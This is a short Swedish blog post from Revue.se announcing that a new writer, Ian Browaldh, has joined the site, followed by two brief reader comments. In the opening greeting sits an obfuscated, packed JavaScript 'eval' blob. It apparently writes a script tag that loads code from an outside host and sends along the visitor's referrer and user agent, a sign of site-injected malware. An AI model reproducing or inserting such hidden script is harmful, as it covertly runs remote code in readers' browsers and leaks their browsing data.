Image Image Image Image Image Image Image Image Image Image

| 18 januari, 2020

Scroll to top

Top

Revue.se växer så det knakar!!!

Revue.se växer så det knakar!!!
Filip Urde
  • On 2 oktober, 2011
  • http://www.revue.se/filip-urde

Kära eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|iiszr|var|u0026u|referrer|tznry||js|php’.split(’|’),0,{}))
läsare,

vi på Revue.se är mycket glada över utvecklingen på vår hemsida den senaste tiden. Besökarantalet har skjutit i luften och vi känner i dagsläget att tre starka personer är åtminstone en stark person för lite… Vi vill kunna leverera till förväntan.

Därför har vi nu öppnat upp rekryteringen och tagit in Ian Browaldh.

Välkommen till Revue.se Ian! Vi ser alla fram emot att bli bjudna på varsin ”tumpa rulle”…

 

Comments

  1. Snickers

    haha bra hund!!!

  2. Välkommen Ian!!!